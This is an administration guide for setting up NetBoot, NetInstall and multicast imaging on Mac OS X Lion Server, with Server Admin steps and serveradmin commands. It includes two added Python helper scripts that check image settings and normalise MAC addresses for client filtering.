You can restrict access to NetBoot service on a case-by-case basis by listing the hardware addresses (also known as the Ethernet or MAC addresses) of computers that you want to permit or deny access to. The hardware address of a client computer is added to the NetBoot Filtering list when the client starts up using NetBoot and is, by default, enabled to use NetBoot service. You can specify other services. See Restrict NetBoot clients by filtering addresses.

NetInstall Images

A NetInstall image is an image that starts up the client computer long enough to install software from the image. The client can then start up from its own hard disk. In the same way that a NetBoot image replaces the role of a hard disk, a NetInstall image is a replacement for an installation DVD. Like a bootable CD, NetInstall is a convenient way to reinstall the operating system, applications, or other software onto the local hard disk. For system administrators deploying large numbers of computers with the same version, NetInstall can be very useful. NetInstall does not require the insertion of a CD into each NetBoot client because startup and installation information is delivered over the network.

When you create a NetInstall image with System Image Utility, you can automate the installation process by limiting interaction at the client computer. Because an automatic network installation can be configured to erase the contents of the local hard disk before installation, data loss can occur. You must control access to this type of NetInstall image and must communicate the implications of using it to those using these images. Before using automatic network installations, it is always wise to inform users to back up critical data.

You can perform software installations through NetInstall using a collection of packages or an entire disk image (depending on the source used to create the image). For more information about preparing NetInstall images to install software over the network, see Create NetInstall images in System Image Utility Help.

Applications for setting up and managing images

You use the following Lion Server applications to set up and manage NetBoot, NetInstall, and NetRestore:

System Image Utility, to create Mac OS X Lion NetBoot, NetInstall, and NetRestore disk images. This utility is installed with Lion Server software in the /Applications/Server/ folder.
Server Admin, to enable and configure NetBoot service and supporting services. You can download Server Admin Tools at http://support.apple.com/downloads/. The Server Admin Tools are installed in the /Applications/Server/ folder.
PackageMaker, to create package files you use to add software to disk images.
Property List Editor, to edit property lists such as NBImageInfo.plist.

Note: To create an image, you must have valid Mac OS X Lion image sources or volumes. You cannot create an image of the startup disk you are running on.


NetBoot considerations and requirements


Before you set up NetBoot on your server, make yourself familiar with your network configuration, including the DHCP services it provides. Be sure you meet the following requirements:
- You're the server administrator.
- You're familiar with network setup.
- You know the DHCP configuration. You might need to work with your network staff to change network topologies, switches, routers, and other network settings.

Client computer requirements

All systems supported by Mac OS X Lion can use NetBoot to start from a Mac OS X Lion disk image on a server. At the time of this publication, this includes any Intel-based Macintosh computer. You must install the latest firmware updates on all client computers. Firmware updates are available from the Apple support website: www.apple.com/support/.

Client computer RAM requirements

NetBoot client computers must have at least 512 MB of RAM. Network Install client computers must also have 512 MB of RAM.

Software updates for NetBoot system disk images

You must use the latest system software when creating NetBoot disk images. New Macintosh computers require updates of system software, so if you have new Macintosh clients you must update your NetBoot images. To update a Mac OS X Lion disk image, you must recreate the image. New images can easily be recreated by running a saved image creation workflow. For more information, see System Image Utility Help.

Ethernet support on client computers

NetBoot is supported only over built-in Ethernet connections. Multiple Ethernet ports are not supported on client computers. Clients must have at least 100-Mbit Ethernet adapters.

Network hardware requirements

The type of network connection you must use depends on the number of clients you expect to boot over the network:
- Fewer than 10 clients: 100-Mbit Ethernet
- 10 to 50 clients: 100-Mbit switched Ethernet
- More than 50 clients: Gigabit Ethernet
These are estimates for the number of clients supported.

Network service requirements

Depending on the types of clients you want to boot or install, your NetBoot server must also provide the following supporting services.
Service provided by NetBoot server   For booting Macs with hard disks   For booting Macs without hard disks
DHCP                                 Optional                           Optional
NFS                                  Required if no HTTP                Required if no HTTP
AFP                                  Not required                       Required
HTTP                                 Required if no NFS                 Required if no NFS
TFTP                                 Required                           Required

Note: DHCP service is listed as optional because although it is required for NetBoot, it can be provided by a server other than the NetBoot server. Services marked required must be running on the NetBoot server.

NetBoot and AirPort

The use of AirPort wireless technology to boot clients using NetBoot is not supported by Apple and is discouraged.

Capacity planning

The number of NetBoot client computers your server can support depends on how your server is configured, when your clients routinely start, the server's hard disk space, and a number of other factors. When planning for your server and network needs, consider these factors:
- Ethernet speed: 100Base-T or faster connections are required for client computers and the server. As you add clients, you might need to increase the speed of your server's Ethernet connections. Ideally you want to take advantage of the Gigabit Ethernet capacity built in to your Mac server hardware to connect to a Gigabit switch. From the switch, connect Gigabit Ethernet or 100-Mbit Ethernet to each NetBoot client.
- Hard disk capacity and number of images: Boot and installation images occupy hard disk space on server volumes, depending on the size and configuration of the system image and the number of images being stored. Images can be distributed across multiple volumes or multiple servers. For more information, see Performance and load balancing.
- Hard disk capacity and number of users: If you have a large number of diskless clients, consider adding a separate file server to your network to store temporary user documents. Because the system software for a disk image is written to a shadow image for each client booting from the disk image, you can get a rough estimate of the required hard disk capacity by multiplying the size of the shadow image by the number of clients.
- Number of Ethernet ports on the switch: Distributing NetBoot clients over multiple Ethernet ports on your switch offers a performance advantage. Each port must serve a distinct segment.

Set up NetBoot service

NetBoot setup overview


Here is an overview of the basic steps for setting up NetBoot service.

Evaluate and update your network, servers, and client computers as necessary

The number of client computers you can support using NetBoot is determined by the number of servers you have, how they're configured, hard disk storage capacity, and other factors. See NetBoot considerations and requirements. Depending on the results of this evaluation, you might want to add servers or hard disks, add Ethernet ports to your server, or make other changes to your servers. You might also want to set up more subnets for BootP clients, depending on the number of clients you support. You might also want to implement subnets on this server (or other servers) to take advantage of NetBoot filtering.

To provide authentication and personalized work environments for NetBoot client users by using Workgroup Manager, set up workgroups and import users from the Mac server Users & Groups database before you create disk images. Make sure you have at least one administrator user assigned to the Workgroup Manager for Mac OS X Lion client.

Create disk images for client computers

You can set up Mac OS X Lion disk images for client computers to start from. To create Mac OS X Lion disk images, you use System Image Utility. See System Image Utility Help. You might also want to restrict access to NetBoot images by using Model Filtering. See System Image Utility Help. To create application packages that you can add to an image, use PackageMaker. Application software packages can be installed by themselves or with Mac OS X Lion system software. See System Image Utility Help.

Set up DHCP

NetBoot requires a DHCP server running on the local server or on another server on the network. Make sure you have a range of IP addresses sufficient to accommodate the number of clients that will use NetBoot at the same time. For more information about configuring DHCP, see Server Admin Help. If your NetBoot server also supplies DHCP service, you might get better performance if you configure your server as a gateway. That is, configure your subnets to use the server's IP address as the router IP address.

Configure and turn on NetBoot service

You use the NetBoot settings in Server Admin to configure NetBoot on your server. You turn on NetBoot service using Server Admin. See Start NetBoot and related services and Enable images.

(Optional) Set up Ethernet address filtering

NetBoot filtering is performed based on the client computer hardware address. Each client's hardware address is registered when the client selects a NetBoot or NetInstall volume from the startup disk. You can permit or deny specific clients by address. See Restrict NetBoot clients by filtering addresses.

Test your NetBoot setup

Because there is a risk of data loss or of bringing down the network (by misconfiguring DHCP), test your NetBoot setup before implementing it. Test each Macintosh model you support to verify that there are no problems booting into the image on a specified hardware type.

Set up client computers to use NetBoot

When you're satisfied that NetBoot is working on all types of client computers, set up the client computers to start from the NetBoot disk images. You can use the client computer's Startup Disk System Preferences pane to select a startup disk image from the server and then restart the computer. See Select a NetBoot boot image. You can also restart the client computer and hold down the N key until the NetBoot icon starts flashing on the screen. The client starts from the default image on the NetBoot server. See Start up using the N key.

Enable NetBoot service


Before you can configure NetBoot settings, you must turn NetBoot service on in Server Admin.

1. Open Server Admin and connect to the server.
2. Click Settings.
3. Click Services.
4. Click the NetBoot checkbox.
5. Click Save.

Configure NetBoot General settings


You use General settings to enable NetBoot service on at least one port and select where image and client data resides.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NetBoot.
4. Click Settings, then click General.
5. In the Enable column, click the checkbox next to the network ports you want to use for serving images.
6. In the Images column, click the checkbox to choose where to store images.
7. In the Client Data column, click the checkbox for each local disk volume where you want to store shadow files used by Mac OS X Lion diskless clients.
8. Click Save.

Configure Images settings


You use Images settings to enable images and select the default image.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NetBoot.
4. Click Settings, then click Images.
5. Enable the images you want clients to use, specify if they are available for diskless clients, and choose the protocol for delivering them. If you're not sure which protocol to use, choose NFS.
6. In the Default column, click the checkbox to select the default image. You can select separate default images for Intel-based and PowerPC-based Macintosh clients.
7. Click Save.

Configure filter settings


To restrict client computers, you can set up filters that allow or deny access to NetBoot service depending on the computer's MAC address. You can enter a MAC address in canonical or noncanonical form in the filter list. The canonical form of a MAC address contains leading zeros and lowercase hex digits separated by colons. For example, 01:a1:0c:32:00:b0 is the canonical form of a MAC address and 1:a1:c:32:0:b0 is the noncanonical form of the same MAC address.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NetBoot.
4. Click Settings, then click Filters.
5. Select Enable NetBoot/DHCP filtering.
6. Select Allow only clients listed below (deny others) or Deny only clients listed below (allow others).
7. Use the Add button (+) and Delete button (-) to set up the list of client addresses, and click OK. To look up a MAC address, enter the client's DNS name or IP address in the Host Name field and click Find. To find the hardware address for a computer using Mac OS X Lion, look on the TCP/IP pane of the computer's Network preferences or run System Profiler.
8. Click Save.

Note: You can also restrict access to a NetBoot image by selecting the name of the image in the Images pane of NetBoot service settings in Server Admin, clicking the Edit (pencil) button, and providing the required information.

Configure NetBoot Logging settings


You use Logging settings to choose the level of detail recorded in the service log.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NetBoot.
4. Click Settings, then click Logging.
5. From the pop-up menu, choose the log detail level (Low, Medium, or High).
6. Click Save.

Use serveradmin to configure NetBoot logging


You can use serveradmin to configure NetBoot settings.

To configure a NetBoot service setting:
$ sudo serveradmin settings netboot:logging_level = value

To view NetBoot service configuration settings:
$ sudo serveradmin settings netboot

Parameter       Description
logging_level   Default = Medium. Possible values are Low, Medium, or High.

For information about command-line parameters, see NetBoot service settings. For information about serveradmin, see its man page.

Enable NetBoot 1.0 for older NetBoot clients


For older computers, such as tray-loading iMac or Power Macintosh G3 (Blue and White) computers, to use NetBoot, you must enable NetBoot 1.0. You can do so by using the dscl tool.

Note: NetBoot 1.0 and 2.0 can run on the same network simultaneously.

Enter the following:
$ sudo dscl . create /config/dhcp old_netboot_enabled port_list
$ sudo killall bootpd

Parameter   Description
port_list   List of ports you want to enable for NetBoot 1.0, separated by spaces, for example: en0 en1 en2

Start NetBoot and related services


NetBoot service uses AFP, NFS, DHCP, Web, and TFTP services, depending on the types of clients you're trying to boot. (See NetBoot considerations and requirements.) You can use Server Admin to start DHCP, Web, and NetBoot services. You can use the Server app to start AFP. NFS and TFTP services start automatically.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. If you boot diskless Mac OS X Lion clients, start AFP service in the Server app by selecting File Sharing and then turning it on.
4. If your server is providing DHCP service, make sure the DHCP service is configured and running; otherwise, DHCP service must be supplied by another server on your network. If your NetBoot server is also supplying DHCP service, you might get better performance if you configure your server as a gateway. That is, configure your subnets to use the server's IP address as the router IP address.
5. From the expanded Servers list, select NetBoot.
6. Click Settings, then click General.
7. Select which network ports to use for providing NetBoot service. You can select one or more network ports to serve NetBoot images. For example, if you have a server with two network interfaces, each connected to a network, you can choose to serve NetBoot images on both networks.
8. Click Images.
9. Select the images to serve.
10. Click Save.
11. Click the Start NetBoot button (below the Servers list).

Start NetBoot from the command line


You can use serveradmin to start NetBoot services using the command line.

To start NetBoot and supporting services:
$ sudo serveradmin start netboot

If you get the following response, you have not enabled NetBoot on a network port:
netboot:state = "STOPPED"
netboot:status = 5000

For information about serveradmin, see its man page.

Enable images from the command line


You can use serveradmin to enable images on your server, to make the images available to client computers for NetBoot startups.

To enable a disk image:
$ sudo serveradmin settings netboot:netBootImagesRecordsArray:_array_index:n:IsEnabled = yes

Parameter (netboot:)
netBootImagesRecordsArray:_array_index:n:IsEnabled
    Sets whether the image is available to NetBoot. Default = no
n
    The array index number of the image you want to enable.

For information about command-line parameters, see NetBoot service settings. For information about serveradmin, see its man page.

Manage images

Balance NetBoot image access


If you add a second NetBoot server to a network, have your users reselect their NetBoot image in the Startup Disk control panel or preferences pane. This causes the NetBoot server load to be redistributed between the servers. You can also force redistribution of the load by deleting the /var/db/bsdpd_clients file from the existing NetBoot server.

Note: After deleting the bsdpd_clients file, the server does not remember which clients selected which NetBoot or NetInstall volumes via Startup Disk. Unless the clients reselect their intended NetBoot or NetInstall volumes, the clients boot into the default image on the server.

Similarly, if you're recovering from a server or infrastructure failure and your clients are starting up from a reduced number of NetBoot servers, delete the bsdpd_clients file from the running servers so clients can again start from among the entire set of servers.

The bsdpd_clients file holds the Ethernet MAC addresses of the computers that have selected the server as their NetBoot server. As long as a client has an entry in an available server's bsdpd_clients file, it always starts from that server. If that server becomes unavailable, the clients locate and associate themselves with an available server until you remove their entries (or the files) from their servers.

Note: If a client is registered on more than one server because an unavailable server comes back online, the client starts up from the server with the fewest clients that started from it.

Enable images
You must enable disk images on your server to make the images available to client computers for NetBoot startups.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NetBoot.
4. Click Settings, then click Images.
5. For each image you want your clients to see, click the checkbox in the Enable column.
6. Click Save.

Choose where images are stored


You can use Server Admin to choose volumes for storing NetBoot and NetInstall images.

WARNING: Don't rename a NetBoot share point or the volume it resides on. Don't use Server Admin to stop sharing for a NetBoot share point unless you first deselect the share point for images and shadow files.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NetBoot.
4. Click Settings, then click General.
5. In the list of volumes (in the lower half of the pane), click the checkbox in the Images column for each volume you want to store image files on.
6. Click Save.

Choose where images are stored, from the command line


You can use serveradmin to choose volumes for storing NetBoot and NetInstall images.

To specify a volume to store image files:
$ sudo serveradmin settings
netboot:netBootStorageRecordsArray:_array_index:n:sharepoint = value
netboot:netBootStorageRecordsArray:_array_index:n:clients = value
netboot:netBootStorageRecordsArray:_array_index:n:ignorePrivs = value
netboot:netBootStorageRecordsArray:_array_index:n:volType = value
netboot:netBootStorageRecordsArray:_array_index:n:path = value
netboot:netBootStorageRecordsArray:_array_index:n:volName = value
netboot:netBootStorageRecordsArray:_array_index:n:volIcon = value
netboot:netBootStorageRecordsArray:_array_index:n:okToDeleteClients = value
netboot:netBootStorageRecordsArray:_array_index:n:okToDeleteSharepoint = value
Control-D

Parameter (netboot:)
netBootStorageRecordsArray:_array_index:n:sharepoint
    First parameter in an array describing a volume available to serve images. Default = "no"
netBootStorageRecordsArray:_array_index:n:clients
    Whether the volume also stores client shadow files. Default = "no"
netBootStorageRecordsArray:_array_index:n:ignorePrivs
    Default = "false"
netBootStorageRecordsArray:_array_index:n:volType
    Default = voltype. Example: "hfs"
netBootStorageRecordsArray:_array_index:n:path
    Default = "/"
netBootStorageRecordsArray:_array_index:n:volName
    Default = name
netBootStorageRecordsArray:_array_index:n:volIcon
    Default = icon
netBootStorageRecordsArray:_array_index:n:okToDeleteClients
    Default = "yes"
netBootStorageRecordsArray:_array_index:n:okToDeleteSharepoint
    Default = "yes"
n
    The array index number of the volume you want to configure.

For information about serveradmin, see its man page.

Choose where shadow files are stored


When a diskless client boots, shadow (temporary) files are stored on the server. You can use Server Admin to specify which server volumes are used to store the shadow files.

WARNING: Don't rename a NetBoot share point or the volume it resides on. Don't use Server Admin to stop sharing for a NetBoot share point unless you first deselect the share point for images and shadow files.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NetBoot.
4. Click Settings, then click General.
5. In the list of volumes (in the lower half of the pane), click the checkbox in the Client Data column for the volumes to store shadow files on.
6. Click Save.

Use serveradmin to choose where shadow files are stored

You can use serveradmin to specify which server volumes are used to store shadow files.

To specify a volume to store shadow files:
$ sudo serveradmin settings
netboot:netBootStorageRecordsArray:_array_index:n:sharepoint = value
netboot:netBootStorageRecordsArray:_array_index:n:clients = yes
netboot:netBootStorageRecordsArray:_array_index:n:ignorePrivs = value
netboot:netBootStorageRecordsArray:_array_index:n:volType = value
netboot:netBootStorageRecordsArray:_array_index:n:path = value
netboot:netBootStorageRecordsArray:_array_index:n:volName = value
netboot:netBootStorageRecordsArray:_array_index:n:volIcon = value
netboot:netBootStorageRecordsArray:_array_index:n:okToDeleteClients = value
netboot:netBootStorageRecordsArray:_array_index:n:okToDeleteSharepoint = value
Control-D

Parameter (netboot:)
netBootStorageRecordsArray:_array_index:n:sharepoint
    First parameter in an array describing a volume available to serve images. Default = "no"
netBootStorageRecordsArray:_array_index:n:clients
    Set to yes to store client shadow files on this volume. Default = "no"
netBootStorageRecordsArray:_array_index:n:ignorePrivs
    Default = "false"
netBootStorageRecordsArray:_array_index:n:volType
    Default = voltype. Example: "hfs"
netBootStorageRecordsArray:_array_index:n:path
    Default = "/"
netBootStorageRecordsArray:_array_index:n:volName
    Default = name
netBootStorageRecordsArray:_array_index:n:volIcon
    Default = icon
netBootStorageRecordsArray:_array_index:n:okToDeleteClients
    Default = "yes"
netBootStorageRecordsArray:_array_index:n:okToDeleteSharepoint
    Default = "yes"
n
    The array index number of the volume you want to configure.

For information about serveradmin, see its man page.

Use images stored on remote servers


You can store NetBoot or NetInstall images on remote servers other than the NetBoot server. You must copy the images from the NetBoot server to the remote server and then configure the remote server to use the images.

1. Copy the image.nbi folder from the NetBoot server to the remote server on a NetBoot sharepoint (/Library/NetBoot/NetBootSPn). If the image is on the remote server, you can create the .nbi folder on the NetBoot server by duplicating an existing .nbi folder and adjusting the values in its NBImageInfo.plist file.
2. Open Server Admin and connect to the remote server.
3. Click the triangle at the left of the server. The list of services appears.
4. From the expanded Servers list, select NetBoot.
5. Click Settings, then click Images.
6. For each image you want your clients to see from the remote server, click the checkbox in the Enable column.
7. Select the protocol you want NetBoot to use when serving your image (NFS or HTTP).
8. Click Save.

Specify the default image


The default image is the image used when you start up a client computer while holding down the N key, provided that the client hasn't selected a NetBoot or NetInstall volume via Startup Disk. See Start up using the N key. If you created more than one startup disk image, you can use NetBoot service settings in Server Admin to select the default startup image.

Important: If you have diskless clients, set their boot image as the default image. If you have more than one NetBoot server on the network, a client uses the default image from the first server that responds. There is no way to control which default image is used when more than one is available.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NetBoot.
4. Click Settings, then click Images.
5. In the Default column, click the checkbox next to the image. You can select separate default images for Intel-based and PowerPC-based Macintosh computers. The Architecture column shows the image type. Mac OS X Lion images can boot Intel-based Macintosh computers only.
6. Click Save.

Use serveradmin to specify the default image


You can use serveradmin to set the default image used when you start up a client computer while holding down the N key.

To specify the default image:
$ sudo serveradmin settings netboot:netBootImagesRecordsArray:_array_index:n:IsDefault = yes

Parameter (netboot:)
netBootImagesRecordsArray:_array_index:n:IsDefault
    yes: Specifies this image file as the default boot image on the subnet.
n
    The array index number of the image you want to set as the default image.

For information about serveradmin, see its man page.

Set an image for diskless booting


You can use Server Admin to make an image available for booting client computers that have no local disk drives. Setting an image for diskless booting instructs the NetBoot server to allocate space for the clients' shadow files.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NetBoot.
4. Click Settings, then click Images.
5. In the Diskless column, click the box next to the image in the list.
6. Click Save.

Important: If you have diskless clients, set their NetBoot image as the default image. For help specifying where the clients' shadow files are stored, see Choose where shadow files are stored.

Use serveradmin to set an image for diskless booting


You can use serveradmin to make an image available for booting client computers that have no local disk drives.

To set an image for a diskless boot:
$ sudo serveradmin settings netboot:netBootImagesRecordsArray:_array_index:n:SupportsDiskless = yes

Parameter (netboot:)
netBootImagesRecordsArray:_array_index:n:SupportsDiskless
    yes: Directs the NetBoot server to allocate space for shadow files needed by diskless clients.
n
    The array index number of the image you want to make available for diskless booting.

For information about serveradmin, see its man page.
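The three serveradmin settings above (IsEnabled, IsDefault and SupportsDiskless) interact: a default image that is not enabled is useless, and the guide's Important note says a diskless image should be the default. The following script, added here as an example and not part of the Lion Server guide or Apple's tools, parses the key = value output format that `sudo serveradmin settings netboot` prints (as shown in the "Start NetBoot from the command line" section) and checks the image records against those rules. The sample output is constructed; the Name field in it is an assumption, the other keys are the ones the guide uses.

```python
"""Added example, not from the Lion Server guide: parse the key = value
output of `sudo serveradmin settings netboot` and check the image records
against the rules the preceding sections state (enable, default, diskless).
The sample output is constructed; IsEnabled, IsDefault and SupportsDiskless
are the keys the guide uses, the Name key is assumed."""
from collections import OrderedDict

IMAGE_PREFIX = "netboot:netBootImagesRecordsArray:_array_index:"

# Constructed sample of what `sudo serveradmin settings netboot` prints.
SAMPLE_OUTPUT = """\
netboot:state = "RUNNING"
netboot:status = 0
netboot:logging_level = "MEDIUM"
netboot:netBootImagesRecordsArray:_array_index:0:Name = "Lion Lab"
netboot:netBootImagesRecordsArray:_array_index:0:IsEnabled = yes
netboot:netBootImagesRecordsArray:_array_index:0:IsDefault = yes
netboot:netBootImagesRecordsArray:_array_index:0:SupportsDiskless = no
netboot:netBootImagesRecordsArray:_array_index:1:Name = "Lion Diskless"
netboot:netBootImagesRecordsArray:_array_index:1:IsEnabled = yes
netboot:netBootImagesRecordsArray:_array_index:1:IsDefault = no
netboot:netBootImagesRecordsArray:_array_index:1:SupportsDiskless = yes
netboot:netBootImagesRecordsArray:_array_index:2:Name = "Lion NetInstall"
netboot:netBootImagesRecordsArray:_array_index:2:IsEnabled = no
netboot:netBootImagesRecordsArray:_array_index:2:IsDefault = yes
netboot:netBootImagesRecordsArray:_array_index:2:SupportsDiskless = no
"""


def _coerce(raw):
    """Turn a serveradmin value ("quoted", yes/no, integer) into str, bool or int."""
    raw = raw.strip()
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':
        return raw[1:-1]
    low = raw.lower()
    if low in ("yes", "true"):
        return True
    if low in ("no", "false"):
        return False
    try:
        return int(raw)
    except ValueError:
        return raw


def parse_settings(text):
    """Map every 'key = value' line to its coerced value; other lines are skipped."""
    settings = {}
    for line in text.splitlines():
        key, sep, raw = line.partition(" = ")
        if sep:
            settings[key.strip()] = _coerce(raw)
    return settings


def image_records(settings):
    """Group netBootImagesRecordsArray keys by array index: {index: {field: value}}."""
    records = {}
    for key, value in settings.items():
        if key.startswith(IMAGE_PREFIX):
            idx, _, field = key[len(IMAGE_PREFIX):].partition(":")
            records.setdefault(int(idx), {})[field] = value
    return OrderedDict(sorted(records.items()))


def check_images(records):
    """Return a list of problems: a default image must be enabled; an enabled
    image that supports diskless clients should be the default; and only one
    default should be set (the guide allows one per architecture, which this
    constructed output does not carry)."""
    problems = []
    defaults = []
    for idx, rec in records.items():
        name = rec.get("Name", "?")
        if rec.get("IsDefault"):
            defaults.append(idx)
            if not rec.get("IsEnabled"):
                problems.append(f"index {idx} ({name}): default but not enabled")
        if rec.get("SupportsDiskless") and rec.get("IsEnabled") and not rec.get("IsDefault"):
            problems.append(f"index {idx} ({name}): diskless image is not the default")
    if len(defaults) > 1:
        problems.append(f"more than one default image: indexes {defaults}")
    return problems


def setting_line(idx, field, value):
    """The line to feed `sudo serveradmin settings` (then Control-D) to fix one field."""
    text = "yes" if value is True else "no" if value is False else str(value)
    return f"{IMAGE_PREFIX}{idx}:{field} = {text}"


if __name__ == "__main__":
    recs = image_records(parse_settings(SAMPLE_OUTPUT))
    for problem in check_images(recs):
        print("PROBLEM:", problem)
    print("to make the diskless image the default, feed serveradmin:")
    print(setting_line(0, "IsDefault", False))
    print(setting_line(1, "IsDefault", True))
```

On a real server, replace SAMPLE_OUTPUT with the captured output of `sudo serveradmin settings netboot`; the lines that setting_line produces can be pasted into `sudo serveradmin settings` followed by Control-D, exactly as the multi-line examples in this chapter do.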

Restrict NetBoot clients by filtering addresses


The filtering feature of NetBoot service lets you restrict access to the service based on the client's Ethernet hardware (MAC) address. A client's hardware address is added to the filter list the first time it starts from an image on the server and is permitted access by default, so it is usually not necessary to enter hardware addresses manually. Because the hardware address is supplied by the client itself, treat filtering as a way to keep unintended computers from picking up NetBoot and NetInstall images (especially images that erase the local disk), not as a substitute for securing the network segment the server is on.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NetBoot.
4. Click Settings, then click Filters.
5. Select Enable NetBoot/DHCP filtering.
6. Select Allow only clients listed below (deny others) or Deny only clients listed below (allow others).
7. Use the Add button (+) and Delete button (-) to set up the list of client addresses, and click OK. To look up a MAC address, enter the client's DNS name or IP address in the Host Name field and click Find. To find the hardware address for a computer using Mac OS X Lion, look on the TCP/IP pane of the computer's Network preferences or run System Profiler.
8. Click Save.

Note: You can also restrict access to a NetBoot image by selecting the name of the image in the Images pane of NetBoot service settings in Server Admin, clicking the Edit (pencil) button, and providing the required information.

Use serveradmin to restrict NetBoot clients by filtering addresses


You can use serveradmin to restrict NetBoot clients.

To add a filter entry:
$ sudo serveradmin settings
netboot:netBootFiltersRecordsArray:_array_index:n:hostName = value
netboot:netBootFiltersRecordsArray:_array_index:n:filterType = value
netboot:netBootFiltersRecordsArray:_array_index:n:hardwareAddress = value
Control-D

Parameter (netboot:)
netBootFiltersRecordsArray:_array_index:n:hostName
    The host name of the filtered computer, if available.
netBootFiltersRecordsArray:_array_index:n:filterType
    Whether the specified computer is allowed or denied access. Options: "allow", "deny"
netBootFiltersRecordsArray:_array_index:n:hardwareAddress
    The Ethernet hardware (MAC) address of the filtered computer.
n
    The array index number of the filter entry you want to set.

For information about command-line parameters, see NetBoot service settings. For information about serveradmin, see its man page.
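The Filters pane accepts a MAC address in canonical or noncanonical form (see Configure filter settings), and the filter records above carry a filterType of "allow" or "deny". The script below, an added example that is not part of the Lion Server guide or of Apple's tools, normalises addresses to the canonical form before they go into hardwareAddress values, so that the same client is never listed twice in two spellings, and evaluates the resulting allow/deny decision. It goes slightly beyond the guide by also accepting hyphen-separated addresses. The function names, the sample records and the reading of how a per-entry filterType combines with the pane's two modes are this example's assumptions.

```python
"""Added example, not from the Lion Server guide: normalise the hardware
addresses fed into NetBoot filter records and evaluate the allow/deny
decision. Function names and sample addresses are constructed."""
import re

_HEX_OCTET = re.compile(r"^[0-9a-fA-F]{1,2}$")


def canonical_mac(addr: str) -> str:
    """Return the canonical form of a MAC address: six colon-separated
    octets, two lowercase hex digits each, leading zeros included.

    Accepts the noncanonical form the Filters pane also accepts
    ('1:a1:c:32:0:b0') and, beyond the guide, the hyphenated form that
    Windows tools print ('01-A1-0C-32-00-B0').
    """
    parts = re.split(r"[:-]", addr.strip())
    if len(parts) != 6 or not all(_HEX_OCTET.match(p) for p in parts):
        raise ValueError(f"not a MAC address: {addr!r}")
    return ":".join(f"{int(p, 16):02x}" for p in parts)


def build_filter(records, mode):
    """Build a decision function from netBootFiltersRecordsArray-style
    records (dicts with 'hardwareAddress' and 'filterType' of 'allow' or
    'deny') and the pane's mode: 'allow_listed' is "Allow only clients
    listed below (deny others)", 'deny_listed' is "Deny only clients
    listed below (allow others)".

    Assumption (this example's reading, not stated in the guide): an
    explicit 'deny' record wins in either mode, and in 'allow_listed'
    mode a client needs an 'allow' record to boot.
    """
    if mode not in ("allow_listed", "deny_listed"):
        raise ValueError(f"unknown mode {mode!r}")
    allowed, denied = set(), set()
    for rec in records:
        mac = canonical_mac(rec["hardwareAddress"])
        if rec["filterType"] == "allow":
            allowed.add(mac)
        elif rec["filterType"] == "deny":
            denied.add(mac)
        else:
            raise ValueError(f"bad filterType in {rec!r}")

    def permitted(client_mac: str) -> bool:
        mac = canonical_mac(client_mac)
        if mac in denied:
            return False
        return mac in allowed if mode == "allow_listed" else True

    return permitted


# Constructed sample: one lab Mac allowed, one loaner explicitly denied.
SAMPLE_RECORDS = [
    {"hostName": "lab-01.example.com", "filterType": "allow",
     "hardwareAddress": "1:a1:c:32:0:b0"},        # noncanonical, as typed
    {"hostName": "loaner.example.com", "filterType": "deny",
     "hardwareAddress": "00-1C-B3-09-85-15"},      # hyphenated
]

if __name__ == "__main__":
    check = build_filter(SAMPLE_RECORDS, "allow_listed")
    for mac in ("01:A1:0C:32:00:B0", "00:1c:b3:09:85:15", "08:00:27:12:34:56"):
        print(canonical_mac(mac), "permitted" if check(mac) else "denied")
```

Run canonical_mac over any address before writing it into a hardwareAddress value; a ValueError means the address was mistyped (wrong number of octets or a non-hex digit), which the Filters pane would otherwise store silently as an entry that never matches.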

Set up NetBoot service across subnets


A network boot starts when the client computer broadcasts for computers that will respond to Boot Service Discovery Protocol (BSDP). By default, routers are usually configured to block broadcast traffic to reduce the amount of unnecessary data flowing to other parts of the network. To provide NetBoot service across subnets, you must configure the router to pass on BSDP traffic to the NetBoot server. To see if your router is capable of passing BSDP traffic, check with your router manufacturer. Sometimes this is also referred to as using a DHCP helper or a DHCP relay agent.

Set up NetBoot clients

Set up diskless clients


NetBoot service enables you to configure client computers without locally installed operating systems or even without installed disk drives. Systemless or diskless clients can start from a NetBoot server using the N key method. (See Start up using the N key.) After the client computer starts, you can use Startup Disk preferences to select the NetBoot disk image as the startup disk for the client. That way you no longer need to use the N key method to start the client from the server.

Removing the system software from client computers gives you more control over user environments. By forcing the client to start up from the server and using client management to deny access to the client computer's local hard disk, you can prevent users from saving files to the local hard disk.

Client computer requirements

Client computers must have an Ethernet connection to the network that the NetBoot server is on and use DHCP to obtain an IP address.

Select a NetBoot boot image


On a client computer, use Startup Disk preferences to select a NetBoot boot image.

1. In System Preferences, select Startup Disk.
2. Select the network volume to start the computer with.
3. Click Restart. The NetBoot icon appears and the computer starts from the selected image.

Image multiple clients using the multicast asr command


You can enable a multicast image s erver using the Mac server Multicast asr command. Multicast asr can restore multiple clients simultaneously from one looping multicast of an asr dis k image. An asr disk image is the same as a NetRestore image that you create us ing System Image Utility. Each client can receive the NetRestore image at any time during a multicast of the image, and the client continues receiving the first part of the next multicast until the client receives the complete NetRestore image. The s erver multicas ts only one copy of the NetRestore image at a time, and all clients receive this copy. If the server finis hes multicasting the NetRes tore image and a client is s till requesting the image, the s erver multicasts the image again. Thus, using multicast asr to stream images to multiple clients doesnt congest the network nearly as much as Network Install with multiple clients. To enable the image server, use the asr tool with the -server flag and a correctly built image and plist file.

To start a multicast server for a specified image:

$ asr -source compressed_image -server configuration.plist

